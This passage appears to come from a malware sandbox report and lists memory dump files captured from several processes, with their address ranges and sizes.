
                                                                                    • memory/4972-280-0x0000000004A10000-0x0000000004A11000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/5020-269-0x00000000050C0000-0x00000000050C1000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/5020-268-0x00000000050B0000-0x00000000050B1000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/5020-266-0x0000000005090000-0x0000000005091000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/5020-253-0x0000000005010000-0x0000000005011000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/5020-262-0x0000000005060000-0x0000000005061000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/5020-270-0x00000000050D0000-0x00000000050D1000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/5020-272-0x00000000050F0000-0x00000000050F1000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/5020-273-0x0000000005100000-0x0000000005101000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/5020-271-0x00000000050E0000-0x00000000050E1000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/5020-274-0x0000000005110000-0x0000000005111000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/5020-264-0x0000000005070000-0x0000000005071000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/5020-260-0x0000000005050000-0x0000000005051000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/5020-265-0x0000000005080000-0x0000000005081000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/5020-267-0x00000000050A0000-0x00000000050A1000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/5020-258-0x0000000005040000-0x0000000005041000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/5020-257-0x0000000005030000-0x0000000005031000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/5020-256-0x0000000005020000-0x0000000005021000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/5020-248-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/5020-249-0x0000000005000000-0x0000000005001000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/5020-243-0x0000000003931000-0x000000000395C000-memory.dmp

                                                                                      Filesize

                                                                                      172KB

                                                                                    • memory/5108-183-0x0000000000400000-0x000000000052C000-memory.dmp

                                                                                      Filesize

                                                                                      1.2MB

                                                                                    • memory/5108-179-0x00000000024C0000-0x00000000025EC000-memory.dmp

                                                                                      Filesize

                                                                                      1.2MB

                                                                                    • memory/5320-301-0x0000000004C30000-0x0000000004C31000-memory.dmp

                                                                                      Filesize

                                                                                      4KB